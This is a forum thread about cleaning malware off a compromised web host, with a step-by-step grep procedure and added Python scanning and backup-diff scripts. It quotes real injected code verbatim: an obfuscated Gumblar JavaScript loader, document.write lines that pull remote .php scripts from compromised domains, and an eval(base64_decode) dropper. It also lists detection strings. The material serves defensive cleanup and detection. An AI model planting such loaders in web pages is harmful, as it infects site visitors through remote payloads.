
My entire server is infected with malware

Discussion in 'Blogging' started by zacatictac, Oct 21, 2010.

  1. zacatictac (Power Member)
    Somehow my entire server has been compromised and malware installed into every website I have. This is like 30 sites. Bluehost just keeps telling me I need to go through and check everything for malware. They have got to be f*cking kidding! There are thousands of files, not to mention I have no idea what to look for. Is there any scanner or way for me to detect these infected files?
     
  2. avalanch (Newbie)
    Download them to your computer via FTP and scan them. Also, if you can't keep track of "thousands of files" then it sounds like websites aren't for you.
     
  3. lcapece (Newbie)
    The same thing happened to me back in May, but even worse: it affected 337 sites. What kind of sites are you running? WordPress? I traced my problem back to a compromised copy of CuteFTP, which scraped my cPanel passwords. What backups do you (hopefully) have?
     
  4. PEBAL (Newbie)
    I had the same problem too. Someone decided to hack my main site and infect it and all of my add-on domains just for fun.

    These guys need to get a life!

    Anyway, that particular site was hosted by HostGator, and once I got in touch with their security dept. they were kind enough to remove all of the bad code from all of my sites' web pages.

    I also have some websites with BlueHost and I guess I assumed they would do likewise if the situation ever arose.

    If I were you I'd press them to see if they can't do it for you.

    Best of luck with this.
     
  5. extremephp (BANNED)
    Not all files will be infected by the malware; only PHP, CSS, JS and TXT files are infected by it!

    Well, out of all the files you suspect to be infected, it may not be in all of them, but in the crucial ones like the header and footer and so on!

    Well, I once got a script, which was entirely for another purpose, and which I fixed to find the infected files on the hosting :D

    Just leave me a Private Message!

    ~ExP~
     
  6. sunseven (Regular Member)
    I had the same thing happen as well and it was more than a bitch to clean. It hit one of my shared client servers and spread over more than 300 sites, so cleanup took more than 2 weeks. However, my staff and I documented the entire process just in case something like that ever happened again. And because I hate malware with a passion and BlackHat has done so much for me, I will share our exact step-by-step instructions that took more than 80 man-hours to put together. Use it and be merry :)


    CLEARING OUT MALWARE
    1.) Make sure the FTP account password has been changed, and that the FTP account accesses the ROOT directory, not just "httpdocs"
    2.) Download the ENTIRE site via FTP
    3.) Create (2) copies, one as a backup in case something is lost, and one that you'll work on.
    4.) Download Windows Grep from http://www.wingrep.com/ and install it.
    5.) Open Windows Grep.
    5a.) Click Options>Expert Mode
    5b.) Click Search>Search...
    5c.) In the window make sure the following is selected:
    -Normal radio selection
    -In File Specifications make sure *.* is in place.
    -In folders specify the DIRECT PATH of the folder you're searching through.
    -Make sure "Recurse folders" is selected.

    6.) In the search string field, search for each of the following strings:

    "gumblar"
    "lite"
    "auto"
    "liteautotop"
    "klaomta"
    "brugeni"
    "bigtruckstopseek"
    ".cn/"
    "eval(unescape"
    "eval(base64_decode"
    "eval(decode"
    "eval(base"
    "base64_decode"
    "(function(){'"
    "eval(String.fromCharCode"
    "neglite.com"
    "niklejo.net"
    "internetcountercheck.com"
    "litegreatestdirect"
    ".cn" - this may not work
    "ar_20a_3d_22S" - this is a small snippet of the JavaScript to help pull up JavaScript-infected files.
    "style="visibility: hidden"></iframe>" - this will pull up any remaining shit.

    The strings from ".cn/" through "internetcountercheck.com" come from the $search array of a PHP search script; the fragment of that script as posted:

        $search = array(
            '.cn/',
            'eval(unescape',
            'eval(base64_decode',
            'eval(decode',
            'eval(base',
            'base64_decode',
            "(function(){'",
            'eval(String.fromCharCode',
            'neglite.com',
            'niklejo.net',
            'internetcountercheck.com',
        );
        $dirs_array = array();
        if ($handle = opendir($dir)) {
            echo "Open dir: " . $dir . "";
            echo "Files:";
            echo "";
            // remainder of the script was not included in the post
        }

    7.) Windows Grep will list all infected files. Clean them out with the text editor of your choice.

    7a.) Scan all files with AVG (it usually finds infected PHP files)
    7b.) Manually search all .js files for JavaScript at the bottom of the file
    7c.) Scan all files with Malwarebytes
    7d.) Delete all instances of "image.php" as this is apparently spreading the virus

    8.) There is a replace function in Windows Grep, but I couldn't get it to work....

    9.) Re-upload all files via FTP.

    10.) Hope for the best that it cleared out everything

    MALICIOUS JAVASCRIPT FULL EXAMPLE


    <script language=javascript><!--
    (function(){var kFJT='%';var cQI='~76~61r~20a~3d~22ScriptEngi~6e~65~22~2cb~3d~22Ve~72sion()+~22~2cj~3d~22~22~2c~75~3d~6eaviga~74or~2eus~65rAg~65nt~3b~69~66~28~28u~2einde~78Of(~22W~69n~22)~3e0)~26~26(~75~2ein~64exO~66~28~22NT~206~22)~3c~30)~26~26~28d~6fcum~65nt~2ecookie~2ein~64exO~66~28~22miek~3d1~22)~3c0)~26~26(~74~79peo~66(~7ar~76zts)~21~3dt~79peof(~22A~22~29~29~29~7bzrvzts~3d~22A~22~3beval(~22i~66(w~69n~64ow~2e~22+a+~22)j~3dj+~22+a+~22~4da~6ao~72~22+~62+~61~2b~22Mi~6eor~22+~62+~61+~22Build~22+~62+~22~6a~3b~22)~3bdocu~6d~65nt~2e~77rite(~22~3cscr~69pt~20src~3d~2f~2fgumblar~2e~63n~2f~72ss~2f~3fid~3d~22+j~2b~22~3e~3c~5c~2f~73cript~3e~22)~3b~7d';eval(unescape(cQI.replace(/~/g,'%')))})();
    --></script>


    FOUND IN JS FILES (at the bottom of the file)
    document.write('<script src=http://rideit.lt/burusports/lidotaajs.php ><\/script>');

    document.write('<script src=http://irsmarketing.com/lang/style.php ><\/script>');
    document.write('<script src=http://donpalm.com/images/inf142_203.php ><\/script>');
    document.write('<script src=http://tequilaconference.com/_vti_bin/newConference_r5_c4_plantilla.php ><\/script>');
    document.write('<script src=http://holyland-cosmetics.com/images/gifimg.php ><\/script>');

    FOUND IN HTML, ASP, ASPX, CF & SOME PNG FILES (at the top above the opening body tag)
    <script src=http://rideit.lt/burusports/lidotaajs.php ></script>

    GREP SEARCH METHODS
    1.) Had to search without the document.write
    2.) Search from "script src=" back first, then from there to the .php, then just starting at http to .php, then just the domain names rideit.lt, irsmarketing.com etc. Then after cleaning all I ran it again searching for the URLs starting with http and ending with .php and it found more, so I definitely think we'll need to scan multiple times

    FOUND 94 OF THESE FILES IN THE IMAGES FOLDER OF MANY SITES
    gifimg.php (which was referenced in the document.write above; I did a regular Windows-based search to find and delete these). For safety I searched for all the other .php file names that are at the end of each of the badware URLs above but found nothing.

    When opening the gifimg.php file I found this code:
    <?php eval(base64_decode followed by a parenthesis and a bunch of binary numbers and letters, so you need to search for this string before the binary code after deleting these gifimg.php files to see if there are more. Scanned again with Grep and could not find anything.

    Misc Notes
    1.) Make sure to download all folders in root as well, especially the folder named "statistics" where the AWStats files are, because there are several HTML files in there that get injected

    P.S. - all the sample code above was taken from our specific situation. I'm sure each one is unique so just use them as a reference.
     
    Last edited: Oct 21, 2010
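The grep procedure in steps 6-7d above, and the obfuscated gumblar loader quoted under MALICIOUS JAVASCRIPT FULL EXAMPLE, both lend themselves to a small script instead of a point-and-click tool. The following is an added example written for this thread in Python, not sunseven's script or anything from the post: it walks the downloaded site tree, applies line-level signatures built from the search strings above (eval-of-decoded-data, remote `.php` script sources, hidden iframes, the hostnames quoted in the thread, the gifimg.php/image.php dropper names), and for the `var X='~76~61r...';eval(unescape(X.replace(/~/g,'%')))` loader it recovers the payload statically (restore the `%`, percent-decode) so the gumblar.cn URL shows up without ever executing the script. The hostname list and the sample site it builds in a temp directory are constructed for the demo; the loader text is the one quoted in the post.

```python
"""Added example for this thread (not code from the post): recursive grep for the
injection signatures quoted above, plus a static decoder for the ~-escaped
eval(unescape(...)) loader.  The sample site tree is constructed for the demo."""
import base64
import re
import tempfile
import urllib.parse
from collections import namedtuple
from pathlib import Path

# Hostnames quoted in the post; extend with the ones from your own infection.
BAD_HOSTS = re.compile(
    r"gumblar\.cn|neglite\.com|niklejo\.net|internetcountercheck\.com|rideit\.lt", re.I)

# Line-level signatures derived from the post's grep strings.
RULES = [
    ("eval-obfuscated", re.compile(
        r"eval\s*\(\s*(base64_decode|unescape|String\.fromCharCode|decode)", re.I)),
    ("remote-php-script-src", re.compile(r"<script\s+src=https?://[^\s>'\"]+\.php\s*>", re.I)),
    ("hidden-iframe", re.compile(r'<iframe[^>]*style="visibility:\s*hidden"[^>]*>', re.I)),
    ("known-bad-host", BAD_HOSTS),
]
DROPPER_NAMES = {"gifimg.php", "image.php"}  # dropper names the post found in images/
Hit = namedtuple("Hit", "path rule line snippet")  # line 0 = whole-file finding

# var X='~76~61r...';eval(unescape(X.replace(/~/g,'%')))  -> capture body and separator
ESCAPED_EVAL = re.compile(
    r"var\s+(?P<name>\w+)='(?P<body>[^']*)';"
    r".*?eval\(unescape\((?P=name)\.replace\(/(?P<sep>.)/g,'%'\)\)\)", re.S)

def decode_escaped_eval(text):
    """Recover the loader payload without executing it: restore '%' and
    percent-decode, which is all that unescape() would have done."""
    m = ESCAPED_EVAL.search(text)
    if not m:
        return None
    return urllib.parse.unquote(m.group("body").replace(m.group("sep"), "%"))

def scan_text(rel, text):
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            if rx.search(line):
                hits.append(Hit(rel, rule, lineno, line.strip()[:80]))
    if Path(rel).name in DROPPER_NAMES:
        hits.append(Hit(rel, "dropper-filename", 0, ""))
    decoded = decode_escaped_eval(text)
    if decoded:  # the C&C host only becomes visible after decoding
        hits.append(Hit(rel, "decoded-loader", 0, decoded[:80]))
        m = BAD_HOSTS.search(decoded)
        if m:
            hits.append(Hit(rel, "known-bad-host", 0, "decoded: " + m.group(0)))
    return hits

def scan_tree(root):
    """Scan every file regardless of extension (the post found payloads in .php,
    .js, .html and .png).  latin-1 decoding never fails on binary input."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            hits.extend(scan_text(p.relative_to(root).as_posix(),
                                  p.read_bytes().decode("latin-1")))
    return hits

# The loader is the sample quoted in the post; every other file below is constructed.
GUMBLAR_LOADER = ("<script language=javascript><!--\n(function(){var kFJT='%';var cQI='"
    "~76~61r~20a~3d~22ScriptEngi~6e~65~22~2cb~3d~22Ve~72sion()+~22~2cj~3d~22~22~2c~75~3d~6eaviga~74or~2eus~65rAg~65nt~3b~69~66~28~28u~2einde~78Of(~22W~69n~22)~3e0)~26~26(~75~2ein~64exO~66~28~22NT~206~22)~3c~30)~26~26~28d~6fcum~65nt~2ecookie~2ein~64exO~66~28~22miek~3d1~22)~3c0)~26~26(~74~79peo~66(~7ar~76zts)~21~3dt~79peof(~22A~22~29~29~29~7bzrvzts~3d~22A~22~3beval(~22i~66(w~69n~64ow~2e~22+a+~22)j~3dj+~22+a+~22~4da~6ao~72~22+~62+~61~2b~22Mi~6eor~22+~62+~61+~22Build~22+~62+~22~6a~3b~22)~3bdocu~6d~65nt~2e~77rite(~22~3cscr~69pt~20src~3d~2f~2fgumblar~2e~63n~2f~72ss~2f~3fid~3d~22+j~2b~22~3e~3c~5c~2f~73cript~3e~22)~3b~7d"
    "';eval(unescape(cQI.replace(/~/g,'%')))})();\n--></script>\n")
REMOTE_JS = r"document.write('<script src=http://rideit.lt/burusports/lidotaajs.php ><\/script>');"

def build_sample_tree(root):
    root = Path(root)
    files = {
        "index.php": '<?php echo "hello"; ?>\n<script src="/js/app.js"></script>\n',  # clean
        "footer.php": "</div>\n" + GUMBLAR_LOADER + "</body></html>\n",
        "js/jquery.js": "function f(){}\n" + REMOTE_JS + "\n",
        "about.html": '<iframe src="http://example.invalid/" style="visibility: hidden"></iframe>\n',
        "images/gifimg.php": "<?php eval(base64_decode('%s')); ?>\n"
            % base64.b64encode(b'echo "x";').decode(),
        "images/logo.png": "\x89PNG\r\n\x1a\n<script src=http://rideit.lt/burusports/lidotaajs.php ></script>\n",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(body.encode("latin-1"))

def run_demo():
    """Build the sample tree, scan it and return {path: set of rule names}."""
    root = Path(tempfile.mkdtemp(prefix="malscan-"))
    build_sample_tree(root)
    summary = {}
    for h in scan_tree(root):
        summary.setdefault(h.path, set()).add(h.rule)
    return summary

if __name__ == "__main__":
    for path, rules in sorted(run_demo().items()):
        print(f"{path}: {', '.join(sorted(rules))}")
```

Point `scan_tree()` at the working copy from step 3 rather than the live server, and treat the output as a worklist, not a verdict: the signatures only know the strings this thread saw, so, as the post says, rescan after cleaning and expect to add patterns of your own. Note that the raw footer line never contains "gumblar.cn" (it is `gumblar~2e~63n`), which is why a plain grep for the hostname misses it and the decoder is needed.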
  7. zacatictac (Power Member)
    Wow, thanks for the feedback guys. And sunseven, thank you very much for the help; I will try this out.
     
  8. freotech (Newbie)
    I had a similar problem, but I was with HostGator and they helped clear off all the malware.

    Are the sites that were infected all WordPress blogs?
     
  9. sunseven (Regular Member)
    No problem, I hope you've cleared it up by now. I freggin hate malware :)
     
  10. ruworth (BANNED)
    I would just delete them and start over, or you will be checking files forever. I know it's a pain but it may be your only solution.
     
  11. gooser898 (Regular Member)
    There must be a way to automatically back up your sites? Something that does it every day, or twice a week. Anyone have any suggestions?
     
  12. goonieguhu (Junior Member)
    If you are using WordPress, there are a lot of plugins that can schedule backups.
     
  13. andy2009 (Junior Member)
    If you have root access, aren't there any good tools that you can install on your server that scan for and remove these things?
     
  14. mangoman (Jr. VIP Premium Member)
    WHM can make daily/weekly/monthly backups if it's enabled. Your host SHOULD have a backup of your sites from a while back. The problem with just restoring the old docs is that you are not fixing the exploit. If your passwords were just jacked, then you would be fine.
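The backup discussion in the last few posts suggests a second way to find infected files that does not depend on knowing the right grep strings: if a copy of the site from before the compromise exists (the host's WHM backup, or your own), every file that was added or changed since then is a candidate. The following is an added example written for this thread in Python, not a tool from any post or from WHM: it hashes both trees and lists added, modified and removed files. The two sample trees (a clean "backup" and an infected "live" copy) are constructed in a temp directory for the demo, and the `example.invalid` host in the injected line is a placeholder.

```python
"""Added example for this thread (not from any post): compare the live web root
against a known-clean backup to list what changed.  Unlike a signature grep,
this catches injections that no search string knows about.  Sample trees are
constructed for the demo; standard library only."""
import hashlib
import tempfile
from pathlib import Path


def tree_digest(root):
    """Map each relative path under root to the SHA-256 of its contents."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def diff_trees(clean_root, live_root):
    """Return (added, modified, removed) relative paths of live vs. clean.
    Added files in images/ or upload directories and modified .php/.js/.html
    files are the first places to look; removed files may be normal churn."""
    clean, live = tree_digest(clean_root), tree_digest(live_root)
    added = sorted(set(live) - set(clean))
    removed = sorted(set(clean) - set(live))
    modified = sorted(p for p in set(live) & set(clean) if live[p] != clean[p])
    return added, modified, removed


def run_demo():
    """Build a clean backup and an infected live copy, then diff them."""
    base = Path(tempfile.mkdtemp(prefix="sitediff-"))
    clean, live = base / "backup", base / "live"
    files = {  # constructed clean site
        "index.php": "<?php include 'header.php'; ?>\n",
        "header.php": "<html><body>\n",
        "js/app.js": "function f(){}\n",
        "images/logo.png": "\x89PNG\r\n\x1a\n",
    }
    for root in (clean, live):
        for rel, body in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(body.encode("latin-1"))
    # Constructed infection on the live copy only: a dropper appears in images/,
    # two files get a line appended (the pattern the thread describes), one is gone.
    (live / "images/gifimg.php").write_text("<?php eval(base64_decode('ZWNobyAieCI7')); ?>\n")
    with open(live / "js/app.js", "a") as f:
        f.write("document.write('<script src=http://example.invalid/x.php ><\\/script>');\n")
    with open(live / "header.php", "a") as f:
        f.write('<iframe style="visibility: hidden"></iframe>\n')
    (live / "images/logo.png").unlink()
    return diff_trees(clean, live)


if __name__ == "__main__":
    added, modified, removed = run_demo()
    print("added:", added)
    print("modified:", modified)
    print("removed:", removed)
```

The comparison is only as good as the backup: confirm with the host when it was taken, and check it with the grep signatures too, since a backup made after the first injection will hide exactly the files you are looking for. And, as mangoman says, restoring the clean copy does not close the way in; the stolen FTP and cPanel passwords mentioned earlier in the thread still need changing.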